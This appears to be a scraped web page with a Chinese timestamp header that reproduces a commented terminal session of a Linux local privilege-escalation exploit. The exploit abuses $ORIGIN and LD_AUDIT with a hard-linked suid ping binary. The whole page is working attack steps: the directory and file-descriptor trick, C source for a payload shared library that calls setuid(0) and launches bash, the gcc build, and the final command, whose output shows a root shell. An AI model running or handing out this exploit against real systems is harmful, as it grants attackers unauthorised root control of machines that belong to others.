更新时间:2022-09-22 15:16:15
# Create a directory in /tmp we can control. |
$ mkdir /tmp/exploit |
|
# Link to an suid binary, thus changing the definition of $ORIGIN. |
$ ln /bin/ping /tmp/exploit/target |
|
# Open a file descriptor to the target binary (note: some users are surprised |
# to learn exec can be used to manipulate the redirections of the current |
# shell if a command is not specified. This is what is happening below). |
$ exec 3< /tmp/exploit/target |
|
# This descriptor should now be accessible via /proc. |
$ ls -l /proc/$$/fd/3 |
lr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target* |
|
# Remove the directory previously created |
$ rm -rf /tmp/exploit/ |
|
# The /proc link should still exist, but now will be marked deleted. |
$ ls -l /proc/$$/fd/3 |
lr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target (deleted) |
|
# Replace the directory with a payload DSO, thus making $ORIGIN a valid target to dlopen(). |
$ cat > payload.c |
void __attribute__((constructor)) init() |
{ |
setuid(0);
|
system("/bin/bash");
|
} |
^D |
$ gcc -w -fPIC -shared -o /tmp/exploit payload.c |
$ ls -l /tmp/exploit |
-rwxrwx--- 1 taviso taviso 4.2K Oct 15 09:22 /tmp/exploit* |
|
# Now force the link in /proc to load $ORIGIN via LD_AUDIT. |
$ LD_AUDIT="/$ORIGIN" exec /proc/self/fd/3 |
sh-4.1# whoami |
root |
sh-4.1# id |
uid=0(root) gid=500(taviso) |